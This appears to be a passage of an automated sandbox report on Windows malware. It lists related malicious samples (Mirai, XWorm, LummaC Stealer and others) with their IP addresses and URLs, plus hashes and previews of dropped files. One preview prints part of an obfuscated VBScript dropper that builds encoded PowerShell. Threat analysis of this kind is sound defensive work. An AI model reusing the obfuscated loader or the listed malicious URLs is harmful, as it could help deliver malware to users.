                                                                                                ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 185.199.108.133
                                                                                                http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                • 151.101.2.132
                                                                                                mierda.txt.pyGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.67.6
                                                                                                http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.67.1
                                                                                                https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                • 151.101.194.137
                                                                                                UNACS-AS-BG8000BurgasBGXClient.exeGet hashmaliciousXWormBrowse
                                                                                                • 87.120.125.47
                                                                                                file.exeGet hashmaliciousDcRat, JasonRATBrowse
                                                                                                • 87.120.113.91
                                                                                                009274965.lnkGet hashmaliciousDarkVision RatBrowse
                                                                                                • 87.120.113.91
                                                                                                hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                • 87.120.115.216
                                                                                                rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.spc.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.arm5.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.x86.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                rebirth.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                                • 87.120.113.63
                                                                                                AMAZON-02UShttps://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                • 15.222.112.179
                                                                                                armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 52.210.103.96
                                                                                                1.elfGet hashmaliciousUnknownBrowse
                                                                                                • 54.239.141.187
                                                                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.251.190.135
                                                                                                armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 35.162.240.3
                                                                                                armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.217.242.144
                                                                                                ub8ehJSePAfc9FYqZIT6.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                • 54.171.230.55
                                                                                                ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 34.249.145.219
                                                                                                http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                • 3.124.71.130
                                                                                                nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                • 18.244.18.122
                                                                                                AMAZON-02UShttps://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                • 15.222.112.179
                                                                                                armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 52.210.103.96
                                                                                                1.elfGet hashmaliciousUnknownBrowse
                                                                                                • 54.239.141.187
                                                                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.251.190.135
                                                                                                armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 35.162.240.3
                                                                                                armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 18.217.242.144
                                                                                                ub8ehJSePAfc9FYqZIT6.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                • 54.171.230.55
                                                                                                ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                • 34.249.145.219
                                                                                                http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                • 3.124.71.130
                                                                                                nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                                • 18.244.18.122
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                28a2c9bd18a11de089ef85a160da29e4http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                • 173.222.162.32
                                                                                                NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousXmrigBrowse
                                                                                                • 173.222.162.32
                                                                                                https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.atGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                installeasyassist.exeGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                search.htaGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                http://aselog24x7.cl/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 173.222.162.32
                                                                                                cB1ItKbbhY.msiGet hashmaliciousUnknownBrowse
                                                                                                • 173.222.162.32
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eCEFA-FAS_LicMgr.exeGet hashmaliciousUnknownBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                m.txt.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                1111.htaGet hashmaliciousUnknownBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                qwertyuiopasdfghjklzxcvbnm.htaGet hashmaliciousUnknownBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                2Mi3lKoJfj.exeGet hashmaliciousQuasarBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                • 52.216.138.83
                                                                                                • 185.166.143.48
                                                                                                • 185.199.111.133
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                C:\Users\user\OneDrive\autoit3.exenj230708full.pdf.scr.exeGet hashmaliciousAsyncRAT, AveMaria, StormKitty, VenomRATBrowse
                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, XWormBrowse
                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWormBrowse
                                                                                                      file.exeGet hashmaliciousLummaC, XWormBrowse
                                                                                                        juwXcVX5AK.exeGet hashmaliciousUnknownBrowse
                                                                                                          qBtDOzhQnS.exeGet hashmaliciousUnknownBrowse
                                                                                                            ufp4rvU3SP.exeGet hashmaliciousUnknownBrowse
                                                                                                              igCCUqSW2T.exeGet hashmaliciousUnknownBrowse
                                                                                                                juwXcVX5AK.exeGet hashmaliciousUnknownBrowse
                                                                                                                  qBtDOzhQnS.exeGet hashmaliciousUnknownBrowse
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):841
                                                                                                                    Entropy (8bit):5.351831766340675
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoIvEE4xDqE4j:MxHKlYHKh3oPtHo6wvEHxDqHj
                                                                                                                    MD5:98DCC730A3C77DCDCA7CD8717EB5D42A
                                                                                                                    SHA1:639509210C17EB73F5DB581FA8CA46B1157D8806
                                                                                                                    SHA-256:E3C80885BCC7FE4F349EFB0470D261E0DE273EE26D47AF09C79F1B4B2F891E49
                                                                                                                    SHA-512:7D11C53167839D428DAE35BF759C73FC0C7C49F2DE35CC99E4F8B69CDD40DFBEEF6D355F15FAB1EED62A64AF94E7BA311C0F8E07C3DA6F3A63410CC3E9882B78
                                                                                                                    Malicious:false
                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):61147
                                                                                                                    Entropy (8bit):5.077943793919534
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                                                                                    MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                                                                                    SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                                                                                    SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                                                                                    SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                                                                                    Malicious:false
                                                                                                                    Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Nlllulx51ll/h:NllU
                                                                                                                    MD5:4293FEE5C8B10DA4F196BB8D3E9677AB
                                                                                                                    SHA1:24B4682AEF78CE9FB08A31ED9066B9DA4B2813C9
                                                                                                                    SHA-256:95B52E61F9A560203DDC32DD3B80645D3E540FF7BF94D05646CA1EA6350E6858
                                                                                                                    SHA-512:262068B072CBE50C506DB5F470C95DA12CC25D7C972DC34290BCCF455508916D1282C733A0F5F7AAF84442786742D5A8512B7095DCA07C177A4318FC1A2FA3B6
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e................................. ..............@..........
                                                                                                                    Process:C:\Users\user\Desktop\3lhrJ4X.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16256
                                                                                                                    Entropy (8bit):5.435162749518033
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:jgJu1/I96U7azaDq29mtOMG0Yv8mjVgbJXYmEEc7NF9Wu0MDxpnO/9bzgf4L:jTu9ZJp9oE07JX2v10MFpWXgf8
                                                                                                                    MD5:905C384C7A571BEEE31BB5BF89D28638
                                                                                                                    SHA1:B5F709E7666089150BF5101AC11C9F545AF4705E
                                                                                                                    SHA-256:81388FA07AF5A65C4C18F548FEFDB686A33F111040A3D1B2B4DF8B3B5157A483
                                                                                                                    SHA-512:F2BD7CCC879EC6002D4A22D218C8199025F6DCE1D812C01E7FA330A0A127C8470B3AD4926A8215B49EE5BC142325D38267C4CFF7759BE24B2BA364DCDF6C21B7
                                                                                                                    Malicious:true
                                                                                                                    Preview: 'g..iknAFcFdbmo = rRegisggfgdsadfkjhgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$Y")..Call Ugsfisging("QBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB")..kbgmhrkI = TimeSerial(8,9,7)..Public Const gAkcIrk = "apikkjAp"..iecapao = "hffhfg" & LenB("fkhkpjkjm") & "hfg"..'SpdmmSip IApohepgr..jFkekbI = TimeSerial(8,7,8)..Public Const kkaIgcaof = "mmmgbcj"..'njedAoh pFbidkI..Call Ugsfisging("0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o")..Call Ugsfisging("$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$B")..akgmmrji = TimeSerial(8,8,9)..Public Const ikImbdf = "aamFehFFg"..keepdhpc = "hffhfg" & LenB("dAderbFA") & "hfg"..'Feambkne jFamAmk..cISaknIna = TimeSerial(7,9,7)..Public Const bprdSagSp = "Sgdmjfak"..'cpakkrie jobeAehgi..Call Ugsfisging("v$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Dec 7 08:10:48 2019, mtime=Fri Jan 3 21:20:10 2025, atime=Sat Dec 7 08:10:48 2019, length=262432, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1315
                                                                                                                    Entropy (8bit):4.64372926451286
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:8mdRz6PocfEm8n/OtA7n+gjh+gjF2b1/qyFm:8m3+PhMm8/37zhzFEgyF
                                                                                                                    MD5:7254FA56222BDC20C5C7BDF601C9D99B
                                                                                                                    SHA1:82DF056892E0A7AAC8E2608EB1A20CFC0607F2BE
                                                                                                                    SHA-256:68B71A2B439F3A29710E373CAD7892F0FEB2834F8168AC390D3B1CDE4A016B29
                                                                                                                    SHA-512:26BC5DBE40DD5131AFD18E66AF6BA3021208A2B66BAD2B42E1CBC8D8F23141D18B6841AB40E0F327AF8322D8DA3653639BC003C1AA7F054426269747FA4082AC
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.... ...{.#7...._7.-^..{.#7... ............................P.O. .:i.....+00.../C:\...................V.1.....DWO`..Windows.@......OwH#Zz.....3.........................W.i.n.d.o.w.s.....h.1.....DWdX..Microsoft.NET.L......O.I#Z.............................,..M.i.c.r.o.s.o.f.t...N.E.T.....\.1.....CW.V..Framework.D......O.I#Zz.....<........................F.r.a.m.e.w.o.r.k.....`.1.....DW\X..v4.0.30319..F......O.I#Zz.....A......................|..v.4...0...3.0.3.1.9.....b.2. ....OYI .MSBuild.exe.H......OYI#Z......e...........p.............M.S.B.u.i.l.d...e.x.e.......h...............-.......g.............c......C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe..Q.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.M.S.B.u.i.l.d...e.x.e.-.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.........$..................C..B..g..(.
                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):262432
                                                                                                                    Entropy (8bit):6.179415524830389
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:7a0t0yH5wCwie3NnQNLpj/Wnqvsw2XpFU4rwOeTubZSzf02RFihx2uzj:m0ny3nnKpqnZRXfw702birr/
                                                                                                                    MD5:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    SHA1:E6256A0159688F0560B015DA4D967F41CBF8C9BD
                                                                                                                    SHA-256:ED9884BAC608C06B7057037CC91D90E4AE5F74DD2DBCE2AF476699C6D4492D82
                                                                                                                    SHA-512:BD69D092ED4F9C5E1F24EAF5EC79FB316469D53849DC798FAE0FCBA5E90869B77EE924C23CC6F692198FF25827AB60AD47BB46CADD6E0AADDE7731CBAFB013BE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
